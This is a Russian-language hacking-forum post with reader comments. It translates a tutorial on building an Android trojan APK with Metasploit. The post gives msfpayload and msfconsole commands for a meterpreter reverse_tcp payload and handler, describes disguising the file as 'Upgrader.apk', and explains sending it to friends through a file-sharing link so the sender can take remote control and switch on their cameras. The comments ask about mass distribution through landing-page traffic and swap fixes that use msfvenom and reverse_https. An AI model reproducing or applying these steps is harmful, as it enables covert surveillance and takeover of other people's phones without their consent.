Дисклеймер Автор, не несёт ответственность за использование вами данных, содержащихся на этих веб-страницах либо найденных по ссылкам с них. Пожалуйста, примите во внимание, что вся информация, находящаяся здесь, предоставлена свободно, как акт доброй воли, без заключения каких-либо договорённостей или договоров между вами и владельцами или пользователями данного сайта, владельцами серверов, на которых он размещён, администраторами проекта, модераторами либо кем-то ещё, любым образом связанными с этим или родственными ему проектами, которые [договоры] могут стать предметом прямых претензий. Вам предоставляется ограниченное право копировать содержимое этой статьи — данное право не предусматривает и не подразумевает никакой договорной или иной ответственности за любую часть статьи или её авторов, участников, организаторов или других пользователей. Обратите внимание, что чтение, распространение или изменение информации, размещённой в статье, может являться нарушением законов той страны, в которой вы просматриваете этот сайт. Привет, хакеры! Добро пожаловать на мой первый перевод англоязычных статей,которые к сожалению,не все могут прочитать и понять: Сегодня я объясню, как довольно легко можно взломать телефоны с OS Android с помощью Kali Linux. (возможно вы, уже знаете об этом) Шаг первый - Запуск Kali Linux Открываем Терминал и создаем trojan apk-приложение Для этого напишите следующую команду: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените значение LHOST на ваш IP) Код msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените значение LHOST на ваш IP) Вы также можете взломать Android в WAN, то есть через Интернет, используя свой общедоступный / внешний IP-адрес в LHOST и путем переадресации портов Шаг второй - Открываем второй терминал Пока файл создается,откройте второй терминал Загрузите консоль metasploit, набрав в терминале: msfconsole Код msfconsole Шаг третий - настройка Listener (слушителя) После загрузки (потребуется время) загрузите эксплойт с несколькими обработчиками, набрав: use exploit / multi / handler Код use exploit / multi / handler Затем пропишите : set payload android/meterpreter/reverse_tcp Код set payload android/meterpreter/reverse_tcp Установите ваш IP в качестве значения LHOST 192.168.0.4 (Даже если вы взломали WAN-тип, ваш частный / внутренний IP-адрес здесь не является общедоступным / внешним) Шаг четвёртый - Exploit! Пропишите эту команду, чтобы запустить слушателя (listener) : exploit Код exploit Скопируйте приложение, которое вы создали (Upgrader.apk) из корневой папки, на Android-телефон. Затем отправьте его на любой файлообменик (например: www.speedyshare.com). Затем отправьте ссылку, которую вам дал ФО, своим друзьям и как только они запустят ваше приложение, вы получите удаленный доступ к их телефонам! (работает только в локальной сети, но если вы использовали метод WAN, вы можете использовать этот эксплоит на любом телефоне,который подключен к сети Интернет) Запустится консоль meterpreter , с помощью, которой вы можете управлять телефоном, команды для meterpreter, вы с легкостью сможете найти в Интернете , пробуем включить его камеру с помощью одной из таких команд: webcam_stream Код webcam_stream Q&A - Вопросы и Ответы (Q-Вопрос, A - ответ) Q - Как взломать телефон WAN методом ? A- Это очень легко и почти то же самое. Сначала вам нужно получить свой публичный IP-адрес. Вы можете найти его здесь. Вам также нужен ваш частный ip. Используйте команду ifconfig Код ifconfig в терминале, чтобы узнать его. Теперь на вышеуказанных шагах есть только два небольших изменения 1) В команде msfvenom в LHOST вам нужно ввести свой публичный IP, 2) При создании слушателя / обработчика в LHOST вам необходимо ввести свой частный IP Q- Приложение весит 0kb, что делать? A- Это означает, что у вас есть синтаксическая ошибка. Повторите проверку команды, которую вы ввели, если она правильная, повторите проверку! Q- В телефоне ошибка - приложение не установлено A- Вам может потребоваться подписать ваш файл APK, новые версии для Android могут дать ошибку. Обратитесь к этому сайту Статья переведена пользователем ankilde , с сайта https://null-byte.wonderhowto.com/ . Свое мнение по поводу статьи и перевода, вы можете высказать в голосовании,прикрепленном к теме и в комментариях.
годнота!. есть вопрос, а можно его использовать массово? т.е. не просто методом СИ тулить ссыль на нашу сборку apk, а допустим повесить на своем ленде и пролить трафом?
msfpayload уже давно не работает, вместо него надо писать msfvenom -p . По крайней мере у меня было так
Также рекомендую заменить reverse _tcp на reverse_https (менять во всех командах где присутствует) У меня на android 7.1.1 reverse_tcp не работал ,сессия умирала через 3 секунды, а с reverse_https уже минут 10 полёт стабильный.Но всё же не понятно что делать если приложение у жертвы закроется/вылетит и тд. Как опять запустить удалённо сессию в таком случае?
Мне кажется, или это кликбейт? Это не удалённый взлом. Ты создал вирус, ты должен скинуть его жертве. Удалённо можно только с помощью EternalBlue на Виндовс. На Андроид нет такого эксплоита
Работает еще? у меня пишет типо ошибку " Handler failed to bind to 192.168.0.110:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444"
КРИПкрипочек, так а как эту проблему решить ? [-] Handler failed to bind to 192.168.0.110:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444